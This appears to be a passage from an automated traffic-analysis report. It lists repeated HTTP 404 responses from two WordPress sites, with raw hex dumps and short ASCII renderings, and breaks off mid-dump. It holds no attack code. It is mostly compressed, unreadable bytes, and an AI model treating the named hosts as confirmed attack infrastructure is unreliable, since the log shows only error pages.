Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:35 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:37 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:40 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:58:00 GMTServer: ApacheX-Powered-By: PHP/8.2.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 35 3e ff 42 c0 fb a2 d1 58 ce c2 eb 28 0d 2e e2 79 94 04 e3 64 be 5f ad cb cb cb e0 3a 59 af d6 a3 c8 51 a9 16 ce 56 51 ba 08 57 40 03 4d d0 69 2d 5c 2e 67 f1 38 5c c5 c9 a2 91 66 d9 97 57 f3 19 5e 11 02 4e 6b f6 50 bd 47 69 f8 cf 75 f2 d8 fb 26 8a 26 25 1c 86 06 25 eb 2c 1b 9f 27 c9 8c ba 6e 4c 51 b2 51 2b 8e f5 1e 00 78 9e cc e7 20 81 ec 06 90 00 1a ae 62 83 94 8d d3 78 b9 52 58 58 45 57 ab c6 bb f0 22 94 a7 a0 9c c6 bf 79 4f 3e ff f9 f9 d7 cf de 3c fb d9 fb b7 c6 67 97 98 c3 e4 32 18 5e 2e a3 79 f2 2e 7e 1d ad 56 f1 e2 2c f3 4e bd 0f b5 51 98 45 3f a5 b3 da 09 13 55 76 f2 b6 f1 b6 91 05 97 44 56 6f 1b f1 1c 74 94 bd 6d 8c 93 34 7a db e0 ca 6f 1b ad 6e d0 0c 9a 6f 1b 83 f6 d5 a0 fd b6 51 ab d7 00 00 ea 07 cb c5 19 be 64 17 67 b7 6b 0f 15 b9 35 fc 7e 21 0d e2 13 35 98 ac d3 71 54 3b f9 50 c3 02 c2 6c 33 18 0a 5e 06 d7 3d 85 6f 1b 97 4b 3f 5e 8c 67 eb 09 0d e1 1d fe e3 01 57 f6 b1 a6 22 8c 3b 98 c7 8b e0 5d f6 d7 8b 28 3d ed 07 dd a0 57 fb f8 f1 31 b0 f7 b9 f7 e6 3c ce 3c 5a 71 1e 7e 87 eb 55 e2 9f 45 8b 28 45 e7 13 42 e8 e7 d3 f5 62 4c 64 77 10 d7 17 87 1f 2e c2 d4 4b ea 59 3d 7a ac 9f 7b e3 83 e8 f0 c3 2a bd e6 77 ab d3 0f d9 7a 49 4c e0 4d 94 ad b2 93 a8 be c2 c2 c8 56 e1 7c 79 72 b0 88 2e bd af d1 f0 61 70 11 ce d6 d1 ab e9 c1 e1 c7 c7 59 94 65 68 fe f5 2a 49 31 03 01 d8 cb b7 18 f7 41 52 ff 3f 5f bf fa 3e c8 56 29 e6 2f 9e 5e 1f ac 0e 0f 3f 02 25 e3 73 ea ee e3 47 d3 fd f2 00 7d 10 68 58 48 18 6a fa 23 d6 fc 41 b3 de ac e3 7b b8 00 a9 04 c2 76 cc d7 f3 28 3e 3b 5f 1d e2 3d 46 3d 7b 83 19 3d 58 a1 78 f3 f0 31 0d 6e Data Ascii: 5402[F.,Z-Wm
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:58:02 GMTServer: ApacheX-Powered-By: PHP/8.2.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 35 3e ff 42 c0 fb a2 d1 58 ce c2 eb 28 0d 2e e2 79 94 04 e3 64 be 5f ad cb cb cb e0 3a 59 af d6 a3 c8 51 a9 16 ce 56 51 ba 08 57 40 03 4d d0 69 2d 5c 2e 67 f1 38 5c c5 c9 a2 91 66 d9 97 57 f3 19 5e 11 02 4e 6b f6 50 bd 47 69 f8 cf 75 f2 d8 fb 26 8a 26 25 1c 86 06 25 eb 2c 1b 9f 27 c9 8c ba 6e 4c 51 b2 51 2b 8e f5 1e 00 78 9e cc e7 20 81 ec 06 90 00 1a ae 62 83 94 8d d3 78 b9 52 58 58 45 57 ab c6 bb f0 22 94 a7 a0 9c c6 bf 79 4f 3e ff f9 f9 d7 cf de 3c fb d9 fb b7 c6 67 97 98 c3 e4 32 18 5e 2e a3 79 f2 2e 7e 1d ad 56 f1 e2 2c f3 4e bd 0f b5 51 98 45 3f a5 b3 da 09 13 55 76 f2 b6 f1 b6 91 05 97 44 56 6f 1b f1 1c 74 94 bd 6d 8c 93 34 7a db e0 ca 6f 1b ad 6e d0 0c 9a 6f 1b 83 f6 d5 a0 fd b6 51 ab d7 00 00 ea 07 cb c5 19 be 64 17 67 b7 6b 0f 15 b9 35 fc 7e 21 0d e2 13 35 98 ac d3 71 54 3b f9 50 c3 02 c2 6c 33 18 0a 5e 06 d7 3d 85 6f 1b 97 4b 3f 5e 8c 67 eb 09 0d e1 1d fe e3 01 57 f6 b1 a6 22 8c 3b 98 c7 8b e0 5d f6 d7 8b 28 3d ed 07 dd a0 57 fb f8 f1 31 b0 f7 b9 f7 e6 3c ce 3c 5a 71 1e 7e 87 eb 55 e2 9f 45 8b 28 45 e7 13 42 e8 e7 d3 f5 62 4c 64 77 10 d7 17 87 1f 2e c2 d4 4b ea 59 3d 7a ac 9f 7b e3 83 e8 f0 c3 2a bd e6 77 ab d3 0f d9 7a 49 4c e0 4d 94 ad b2 93 a8 be c2 c2 c8 56 e1 7c 79 72 b0 88 2e bd af d1 f0 61 70 11 ce d6 d1 ab e9 c1 e1 c7 c7 59 94 65 68 fe f5 2a 49 31 03 01 d8 cb b7 18 f7 41 52 ff 3f 5f bf fa 3e c8 56 29 e6 2f 9e 5e 1f ac 0e 0f 3f 02 25 e3 73 ea ee e3 47 d3 fd f2 00 7d 10 68 58 48 18 6a fa 23 d6 fc 41 b3 de ac e3 7b b8 00 a9 04 c2 76 cc d7 f3 28 3e 3b 5f 1d e2 3d 46 3d 7b 83 19 3d 58 a1 78 f3 f0 31 0d 6e Data Ascii: 5402[F.,Z-Wm
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:58:05 GMTServer: ApacheX-Powered-By: PHP/8.2.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 